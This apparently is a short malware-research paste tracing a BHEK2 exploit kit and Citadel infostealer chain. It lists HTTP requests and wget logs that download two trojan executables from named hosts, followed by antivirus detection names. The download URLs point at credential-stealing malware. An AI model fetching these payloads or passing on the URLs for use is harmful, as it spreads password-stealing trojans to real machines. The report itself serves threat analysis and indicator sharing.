The BHEK2 Citadel Download these two more...

1. *) Previous report: http://pastebin.com/raw.php?i=z7n6SVxf
2. *) Continuation of the Linkedin Spam, BHEK2, PluginDetect e,f, and Citadel InfoStealer(CRYPT to POST/HTTP) AND... finally that payload downloaded THESE TWO MORE Trojans.....
3.  
4. * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me
5. * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252
6.  
7. --15:43:09-- http://3073.a.hostable.me/Z2U.exe
8. => `Z2U.exe'
9. Resolving 3073.a.hostable.me... 204.152.255.3
10. Connecting to 3073.a.hostable.me|204.152.255.3|:80... connected.
11. HTTP request sent, awaiting response... 200 OK
12. Length: 407,128 (398K) [application/x-msdownload]
13. 15:43:12 (180.00 KB/s) - `Z2U.exe' saved [407128/407128]
14.  
15.  
16. --15:43:44-- http://85.18.21.252/PNV3Hbi.exe
17. => `PNV3Hbi.exe'
18. Connecting to 85.18.21.252:80... connected.
19. HTTP request sent, awaiting response... 200 OK
20. Length: 407,128 (398K) [application/x-msdos-program]
21. 15:43:49 (93.95 KB/s) - `PNV3Hbi.exe' saved [407128/407128]
22.  
23. VT:
24. https://www.virustotal.com/file/fed6336f6a8e4d09d83a9eff1485276434be3377012f7bafc99474bd0a7ce162/analysis/1350456794/
25. DrWeb : Trojan.PWS.Panda.3001
26. Norman : W32/Krypt.GB
27. McAfee-GW-Edition : PWS-Zbot.gen.aln
28. nProtect : Trojan/W32.Agent.407128.B
29. McAfee : PWS-Zbot.gen.aln
30. Fortinet : W32/Kryptik.WDV!tr
31. Kingsoft : Win32.Troj.Agent.ai.(kcloud)
32. Panda : Suspicious file
33.  
34. #MalwareMustDie!!!